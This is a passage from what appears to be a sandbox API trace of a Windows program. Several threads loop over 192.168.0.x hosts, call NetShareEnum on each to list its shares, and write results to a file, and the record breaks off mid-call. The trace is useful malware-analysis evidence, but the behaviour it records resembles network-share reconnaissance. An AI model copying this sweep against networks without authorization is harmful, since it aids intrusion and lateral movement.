[0144.227] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x48dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x48dfc54*=0x10, lpOverlapped=0x0) returned 1 [0144.232] NetShareEnum (in: servername="\\\\192.168.0.90", level=0x1, bufptr=0x48dfedc, prefmaxlen=0xffffffff, entriesread=0x48dfed4, totalentries=0x48dfed0, resume_handle=0x48dfecc | out: bufptr=0x48dfedc, entriesread=0x48dfed4, totalentries=0x48dfed0, resume_handle=0x48dfecc) returned 0x35 [0178.331] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.168", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.331] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.168", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.168", lpUsedDefaultChar=0x0) returned 15 [0178.331] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x48dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.331] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.331] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.331] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x48dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.331] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.331] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.331] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x48dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x48dfc54*=0x11, lpOverlapped=0x0) returned 1 [0178.335] NetShareEnum (in: servername="\\\\192.168.0.168", level=0x1, bufptr=0x48dfedc, prefmaxlen=0xffffffff, entriesread=0x48dfed4, totalentries=0x48dfed0, resume_handle=0x48dfecc | out: bufptr=0x48dfedc, entriesread=0x48dfed4, totalentries=0x48dfed0, resume_handle=0x48dfecc) returned 0x35 [0211.206] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.235", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.206] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.235", cchWideChar=15, lpMultiByteStr=0x1e8310c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.235", lpUsedDefaultChar=0x0) returned 15 [0211.206] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x48dfc2c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x48dfc2c*=0x80, lpOverlapped=0x0) returned 1 [0211.334] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x48dec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.334] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.334] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.334] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x48dec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.334] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.334] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.334] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x48dfc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x48dfc54*=0x11, lpOverlapped=0x0) returned 1 [0211.339] NetShareEnum (in: servername="\\\\192.168.0.235", level=0x1, bufptr=0x48dfedc, prefmaxlen=0xffffffff, entriesread=0x48dfed4, totalentries=0x48dfed0, resume_handle=0x48dfecc | out: bufptr=0x48dfedc, entriesread=0x48dfed4, totalentries=0x48dfed0, resume_handle=0x48dfecc) returned 0x35 [0258.064] SetEvent (hEvent=0x1dc) returned 1 [0258.064] RtlExitUserThread (Status=0x0) Thread: id = 52 os_tid = 0xc64 [0088.701] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.35", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.701] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.35", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.35", lpUsedDefaultChar=0x0) returned 14 [0088.701] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4a1ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.701] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.701] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.701] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4a1ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.701] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.701] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.701] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x4a1fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x4a1fc54*=0x10, lpOverlapped=0x0) returned 1 [0088.769] NetShareEnum (in: servername="\\\\192.168.0.35", level=0x1, bufptr=0x4a1fedc, prefmaxlen=0xffffffff, entriesread=0x4a1fed4, totalentries=0x4a1fed0, resume_handle=0x4a1fecc | out: bufptr=0x4a1fedc, entriesread=0x4a1fed4, totalentries=0x4a1fed0, resume_handle=0x4a1fecc) returned 0x35 [0144.469] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.114", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0144.469] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.114", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.114", lpUsedDefaultChar=0x0) returned 15 [0144.469] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4a1ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.469] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.469] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.469] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4a1ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.469] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.469] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.469] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x4a1fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x4a1fc54*=0x11, lpOverlapped=0x0) returned 1 [0144.473] NetShareEnum (in: servername="\\\\192.168.0.114", level=0x1, bufptr=0x4a1fedc, prefmaxlen=0xffffffff, entriesread=0x4a1fed4, totalentries=0x4a1fed0, resume_handle=0x4a1fecc | out: bufptr=0x4a1fedc, entriesread=0x4a1fed4, totalentries=0x4a1fed0, resume_handle=0x4a1fecc) returned 0x35 [0178.212] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.152", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.212] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.152", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.152", lpUsedDefaultChar=0x0) returned 15 [0178.212] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4a1ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.212] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.212] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.212] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4a1ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.212] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.212] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.212] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x4a1fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x4a1fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.216] NetShareEnum (in: servername="\\\\192.168.0.152", level=0x1, bufptr=0x4a1fedc, prefmaxlen=0xffffffff, entriesread=0x4a1fed4, totalentries=0x4a1fed0, resume_handle=0x4a1fecc | out: bufptr=0x4a1fedc, entriesread=0x4a1fed4, totalentries=0x4a1fed0, resume_handle=0x4a1fecc) returned 0x35 [0211.192] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.216", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.192] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.216", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.216", lpUsedDefaultChar=0x0) returned 15 [0211.192] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4a1ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.192] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.192] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.192] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4a1ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0211.192] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.192] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0211.192] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x55, lpNumberOfBytesWritten=0x4a1fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x4a1fc54*=0x55, lpOverlapped=0x0) returned 1 [0211.273] NetShareEnum (in: servername="\\\\192.168.0.216", level=0x1, bufptr=0x4a1fedc, prefmaxlen=0xffffffff, entriesread=0x4a1fed4, totalentries=0x4a1fed0, resume_handle=0x4a1fecc | out: bufptr=0x4a1fedc, entriesread=0x4a1fed4, totalentries=0x4a1fed0, resume_handle=0x4a1fecc) returned 0x35 [0258.062] SetEvent (hEvent=0x1dc) returned 1 [0258.062] RtlExitUserThread (Status=0x0) Thread: id = 53 os_tid = 0xc68 [0088.684] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.32", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.684] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.32", cchWideChar=14, lpMultiByteStr=0x1e82f0c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.32", lpUsedDefaultChar=0x0) returned 14 [0088.684] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4b5ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0088.684] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.684] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0088.684] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4b5ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0088.684] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0088.684] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0088.684] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x4b5fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x4b5fc54*=0x10, lpOverlapped=0x0) returned 1 [0088.689] NetShareEnum (in: servername="\\\\192.168.0.32", level=0x1, bufptr=0x4b5fedc, prefmaxlen=0xffffffff, entriesread=0x4b5fed4, totalentries=0x4b5fed0, resume_handle=0x4b5fecc | out: bufptr=0x4b5fedc, entriesread=0x4b5fed4, totalentries=0x4b5fed0, resume_handle=0x4b5fecc) returned 0x35 [0144.521] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.119", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0144.521] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.119", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.119", lpUsedDefaultChar=0x0) returned 15 [0144.521] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4b5ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0144.521] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.521] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0144.521] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4b5ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0144.521] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0144.521] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0144.521] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x4b5fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x4b5fc54*=0x11, lpOverlapped=0x0) returned 1 [0144.525] NetShareEnum (in: servername="\\\\192.168.0.119", level=0x1, bufptr=0x4b5fedc, prefmaxlen=0xffffffff, entriesread=0x4b5fed4, totalentries=0x4b5fed0, resume_handle=0x4b5fecc | out: bufptr=0x4b5fedc, entriesread=0x4b5fed4, totalentries=0x4b5fed0, resume_handle=0x4b5fecc) returned 0x35 [0178.183] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.148", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0178.183] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.148", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.148", lpUsedDefaultChar=0x0) returned 15 [0178.183] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4b5ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0178.183] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.186] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0178.186] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4b5ec34, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0178.186] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0178.186] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0178.186] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x4b5fc54, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x4b5fc54*=0x11, lpOverlapped=0x0) returned 1 [0178.189] NetShareEnum (in: servername="\\\\192.168.0.148", level=0x1, bufptr=0x4b5fedc, prefmaxlen=0xffffffff, entriesread=0x4b5fed4, totalentries=0x4b5fed0, resume_handle=0x4b5fecc | out: bufptr=0x4b5fedc, entriesread=0x4b5fed4, totalentries=0x4b5fed0, resume_handle=0x4b5fecc) returned 0x35 [0211.191] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.214", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0211.191] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\\\\192.168.0.214", cchWideChar=15, lpMultiByteStr=0x1e82f0c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\\192.168.0.214", lpUsedDefaultChar=0x0) returned 15 [0211.191] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x4b5ec34, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0211.191] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0211.191] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1e8a594, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0211.191] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, 